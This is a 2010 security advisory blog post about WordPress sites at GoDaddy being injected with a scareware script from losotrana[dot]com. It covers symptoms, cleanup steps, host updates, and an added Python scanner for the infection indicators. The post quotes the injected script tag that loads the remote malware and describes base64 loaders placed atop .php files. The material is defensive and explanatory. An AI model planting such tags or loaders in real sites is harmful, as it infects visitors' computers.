Reports have come in of WordPress blogs self-hosted at GoDaddy.com that were infected with the losotrana[dot]com/js.php script on Monday, May 17, 2010 and again on Thursday, May 20, 2010.
Warning: This is dangerous malware! This scareware injection tries to infect your site visitor’s computer. If your visitors do not have an up-to-date anti-virus program running, their computers could get infected.
What You Should Do: If you have an up-to-date version of an anti-virus program running, such as *AVG, please check your website now to see if it redirects you! Note: If you receive a pop-up message to download anything, do NOT click “yes” or “okay.”
If you do not have an updated anti-virus program running, do not go to your website to check. Instead, log in to your site via FTP and look at the “Last Modified” column and see if your .php files all have the same date/time (either 5/16, 5/17 or 5/20/2010).
If your website is infected, put it in maintenance mode immediately so that you do not infect your visitors. Click here for instructions on how to put your site in maintenance mode (see Step 2).
Then clean your website completely and upload a fresh copy. Be sure to check for any suspicious .php files that you did not put on your website. There must be a “trigger” file that sets this infection off. Be sure to remove it!
- Viewing your site’s source code, you will see the following script injected on your pages: <script src="http://losotrana[dot]com/js.php"></script>
- Your site redirects you to a fake website that executes the threat, which tries to download itself to your visitors’ computers.
- A long string of base64_decode script is found at the top of all .php files.
- This threat has the same IP address as the holasionweb.com injection (126.96.36.199).
- Losotrana[dot]com has the same registrant as the other latest attacks and it shows that they have 203 other domains registered too. You can view the whois here, and I have copied it below for you as well.
Hilary Kneber firstname.lastname@example.org
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
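As an added example (not part of the original post, and not a WPSecurityLock or Go Daddy tool), here is a small Python scanner that applies the three indicators listed above to a local copy of a site downloaded over FTP: it flags the injected script tag, a long base64_decode() blob at the top of .php files, and groups .php files by modification day so a mass rewrite stands out the way the “Last Modified” column does. The 200-character blob threshold, the constructed sample files and the timestamp are assumptions.

```python
import os
import re
import tempfile
from datetime import datetime

# Indicators described in the post: an injected <script> tag loading js.php from
# the losotrana domain, and a long base64_decode() blob at the top of .php files.
MIN_BLOB = 200   # assumed threshold for a "long" base64 string; not a figure from the post
HEAD_BYTES = 4096  # only the top of each .php file is checked for the blob
SCRIPT_TAG_RE = re.compile(r'<script[^>]*src=["\']?https?://\s*losotrana\.com/js\.php', re.I)
B64_HEAD_RE = re.compile(r'base64_decode\s*\(\s*["\'][A-Za-z0-9+/=]{%d,}' % MIN_BLOB, re.I)

def scan_webroot(root):
    """Walk a local copy of the site and return findings keyed by indicator."""
    findings = {"script_tag": [], "base64_head": [], "php_mtime_days": {}}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read().decode("latin-1")  # read only, never execute
            if SCRIPT_TAG_RE.search(data):
                findings["script_tag"].append(path)
            if name.endswith(".php"):
                if B64_HEAD_RE.search(data[:HEAD_BYTES]):
                    findings["base64_head"].append(path)
                # Group .php files by modification day: a mass rewrite shows up as
                # one day holding nearly every file, which is the FTP "Last Modified" check.
                day = datetime.fromtimestamp(os.path.getmtime(path)).date().isoformat()
                findings["php_mtime_days"].setdefault(day, []).append(path)
    return findings

def demo():
    """Build a constructed sample site in a temp dir and scan it."""
    root = tempfile.mkdtemp()
    samples = {  # constructed files, not copies of real infected pages
        "index.php": "<?php echo 'clean'; ?>",
        "wp-config.php": '<?php eval(base64_decode("' + "QUFB" * 100 + '")); ?>\n<?php /* config */ ?>',
        "wp-content/themes/x/footer.php": '</div><script src="http://losotrana.com/js.php"></script></body>',
    }
    stamp = 1274097600  # constructed: 2010-05-17 12:00 UTC
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        # the two tampered files share one timestamp; the clean one is a week older
        os.utime(path, (stamp, stamp if rel != "index.php" else stamp - 7 * 86400))
    return scan_webroot(root)
```

Run `demo()` to see the findings on the constructed tree, or call `scan_webroot()` on the directory where you downloaded your site over FTP.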
Here’s a screen shot of the threat stopped by AVG on May 17, 2010
Here’s a screen shot of the threat stopped by AVG on May 20, 2010
We will continue to provide information on this post as it becomes available. WPSecurityLock has contacted Go Daddy to report this latest attack, and we are now emailing MediaTemple as well.
UPDATE 5/17/2010 at 9:20am: We’re receiving reports from webmasters hosting at MediaTemple that their computers were infected and a virus has stolen their FTP passwords. Please make sure your computers are clean and that you change your FTP passwords immediately.
UPDATE 5/17/2010 at 9:58am: After further investigation, we now know that the sites hacked at MediaTemple are not related to this latest attack. They are an isolated incident and not related to the losotrana[dot]com/js.php script.
So far, the only verified reports of websites hit by this attack come from sites hosted at GoDaddy.
UPDATE 5/17/2010 at 10am: We have received correspondence from Go Daddy’s Information Security Operations team. They are aware and working on this issue. They will be providing a statement very soon to give you an update.
UPDATE 5/20/2010 at 10am: We are receiving multiple reports that the losotrana[dot]com/js.php script is rearing its ugly head again today! Please keep an eye on your websites. Some are redirecting to http://webguardyourpc-33p[dot]net/…. (see screen shot above)
UPDATE 5/20/2010 at 5:15pm: Go Daddy is reaching out to our community and has provided the latest statement regarding today’s attacks:
Compromised Website Update 5/20/10
An attack impacting less than 200 accounts happened this morning.
Go Daddy is working with other top hosting providers and security experts to gather information to stop the criminals initiating these exploits.
We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.
As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.
Todd Redfoot, Chief Information Security Officer
We need your help….
This new losotrana[dot]com/js.php malware was just discovered this morning (May 17, 2010) thanks to reports from our community. Please help spread awareness and come together as a community. Be sure to Tweet this message and also add it to your Facebook. If you have any new information, please leave a comment below so we can all help each other.
* Denotes our Affiliate Link. If you a make a purchase through this link, we receive a commission.